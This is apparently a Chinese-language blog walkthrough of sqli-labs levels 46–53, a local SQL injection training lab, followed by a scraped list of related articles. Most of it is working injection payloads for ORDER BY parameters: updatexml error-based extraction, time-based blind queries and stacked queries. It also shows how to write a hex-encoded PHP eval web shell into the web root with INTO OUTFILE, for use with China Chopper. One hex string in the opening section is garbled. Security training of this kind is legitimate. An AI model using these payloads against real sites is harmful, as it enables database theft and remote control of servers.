SQL注入之sqli-labs(八)
目录
(八)第四十六关到五十三关
(1)补充知识
(2)第四十六关
(3)第四十七关
(4)第四十八关
(5)第四十九关
(6)46-49关使用一句话木马
(7)第五十关
(8)第五十一关
(9)第五十二关
(10)第五十三关
(八)第四十六关到五十三关
(1)补充知识
order by 1 desc 使用降序进行排列
order by 1 asc 使用升序进行排列
lines terminated by xxx 以xxx结尾
select * from users into outfile 'D:\\vmworkstation\\phpstudy\\phpstudy_pro\\WWW\\1.php' lines terminated by 0x3c3f70687020406576616c28245f504f53545bundefined8686868undefined95d293b3f3e;
后面那个是一句话木马<?php @eval($_POST[‘hhh’]);?>的16进制形式
(2)第四十六关
我们打开46关,发现他提示我们使用sort 作为参数,首先我们输入
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1
发现是以第一列排序的,改变 sort 的值,发现可以按照不同的值进行排序
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 desc
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 asc
分别为降序排列和升序排列。
使用联合注入,发现不行。
这里我们拿数据的话可以使用以下两种方法:
1、报错注入
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and 1=1--+
发现可以使用and ,我们尝试使用报错注入
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,database()),1)--+
发现可以
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,mid(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1,32),1)--+
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,mid(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1,32),1)--+
然后就是表、字段、数据等
2、时间盲注
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if((database()='security'),sleep(0.3),1)
(3)第四十七关
就是用单引号包裹了sort,其他一样
(4)第四十八关
这里和第四十六关的不一样之处就是不回显报错信息了,所以不能使用报错注入,只能使用时间盲注
(5)第四十九关
单引号包裹,不能使用报错注入,使用时间盲注
(6)46-49关使用一句话木马
我们先用之前的那种方法看能不能写入一句话木马
这里我们以49关为例
http://127.0.0.1/sqli-labs-master/Less-49/?sort=1' and (select '<?php @eval($_POST['hhh']);?>') into outfile 'D:\\vmworkstation\\phpstudy\\phpstudy_pro\\WWW\\2.php'--+
发现没有反应,但是我们使用 lines terminated by 函数就可以了
http://127.0.0.1/sqli-labs-master/Less-49/?sort=1' into outfile 'D:\\vmworkstation\\phpstudy\\phpstudy_pro\\WWW\\2.php' lines terminated by 0x3c3f70687020406576616c28245f504f53545b27686868275d293b3f3e--+
之后就是中国菜刀了
(7)第五十关
我们看一下源码
这个是46~49关的:
这个是50关的:
区别就在于这两个函数不同
PHP mysql_fetch_assoc() 函数 (w3school.com.cn)
PHP mysqli_multi_query() 函数 | 菜鸟教程 (runoob.com)
所以我们可以在本关使用堆叠注入
解题方法:
1、报错注入
http://127.0.0.1/sqli-labs-master/Less-50/?sort=1 and updatexml(1,concat(0x7e,database()),1)
2、时间盲注
http://127.0.0.1/sqli-labs-master/Less-50/?sort=1 and if((database()='security'),sleep(0.3),1)
3、堆叠注入一句话木马
http://127.0.0.1/sqli-labs-master/Less-50/?sort=1 ; select * from users into outfile 'D:\\vmworkstation\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-50\\test.php' lines terminated by 0x3c3f70687020406576616c28245f504f53545b27686868275d293b3f3e
等等
这里只写出了一些简单的用法,更多的请读者自行尝试。
(8)第五十一关
加单引号
(9)第五十二关
不能使用报错注入
(10)第五十三关
加单引号,不能使用报错注入
SQL注入之sqli-labs(八)相关推荐
- SQl注入靶场sqli——第一关
在浏览器中 使用?id=1'–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句. 接下来是在闭合中添加语句执行我们想要的命令 使用 or ...
- SQL注入是什么?如何防止?
SQL注入是一种注入攻击,可以执行恶意SQL语句.下面本篇文章就来带大家了解一下SQL注入,简单介绍一下防止SQL注入攻击的方法,希望对大家有所帮助. 什么是SQL注入? SQL注入(SQLi)是一种 ...
- springboot防止XSS攻击和sql注入
文章目录 1. XSS跨站脚本攻击 ①:XSS漏洞介绍 ②:XSS漏洞分类 ③:防护建议 2. SQL注入攻击 ①:SQL注入漏洞介绍 ②:防护建议 3. SpringBoot中如何防止XSS攻击和s ...
- SQL注入漏洞入门(操作实现)
一 Sql-Inject的概述 SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使 ...
- 万豪 数据泄露 sql注入_如何防止数据库泄漏和注入
万豪 数据泄露 sql注入 by Cossack Labs Dev Stories 哥萨克实验室开发故事 如何防止数据库泄漏和注入 (How to prevent database leaks and ...
- 如何防止SQL注入攻击?
SQL注入是一种注入攻击,可以执行恶意SQL语句.下面本篇文章就来带大家了解一下SQL注入,简单介绍一下防止SQL注入攻击的方法,希望对大家有所帮助. 什么是SQL注入? SQL注入(SQLi)是一种 ...
- sql注入攻击的原理(sql注入攻击防范)
SQL 注入(SQLi)是一种可执行恶意 SQL 语句的注入攻击.这些 SQL 语句可控制网站背后的数据库服务.攻击者可利用 SQL 漏洞绕过网站已有的安全措施.他们可绕过网站的身份认证和授权并访问整 ...
- DVWA之SQL注入
一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞.旨在为安全专业人员测试自己的专业技 ...
- SQL注入之布尔盲注——sql-lab第八关
布尔盲注简介 什么是盲注 盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息. [之前在做联合注入第一关的时候,用union select语句注入 ...
最新文章
- 联想架构调整:智能手机业务很重要
- pandas使用query函数查询dataframe指定数据列的内容(数值)包含在特定列表中的数据行(select rows which column values contain in list)
- 《编译与反编译技术实战》——2.1节编译器、解释器及其工作方式
- 一篇文章教你读懂Spring @Conditional注解
- 三大纪律七项注意(Access数据库)
- 嫁人要嫁IT男 ,嫁对了人天天都是情人节
- 自适应灰色动态滚动网站404页面源码
- 如何设置任务栏和开始菜单属性中的 分组相似任务栏按钮 的个数
- Github新功能 个人展示项目--首页展示个人介绍 图片and so on(2020.08.05)
- [linux/ unix] 查看占用端口的 进程ID 的区别
- (二)开源IT资产管理系统--OCS(win)客户端代理安装
- web service中配置tcp/ip监视器
- 泛微为芯片行业搭建数字化平台:研发、生产、销售、文档一体管理
- 优化算法|蚁群算法的理解及实现
- iOS 颜色渐变圆环
- 【入门】统计字符的个数
- 油价涨涨涨 有车一族省油妙招也不断翻新
- Pdf怎么设置页码,从正文开始
- 蔬菜图片的类型识别系统【基于MobileNetV3模型】
- MSDC 4.3 接口规范(9)
热门文章
- 取消windowsXP桌面图标下的蓝色阴影
- 对vSphere虚拟交换机的理解
- 游戏服务器怎么设置防护?游戏服务器安全防护策略
- python风格变换图片_图片风格转换--深度学习介绍
- 直播回顾:准确性提升到 5 秒级,ssar 独创的 load5s 指标有多硬核?| 龙蜥技术...
- MySQL数据库程序设计套题⑤【真题截图+原理解析】
- 同步FIFO和异步FIFO总结
- av_seek_frame使用详解
- newline函数C语言,[Warning] backslash and newline separated by space
- 所有的快捷方式打不开怎么办?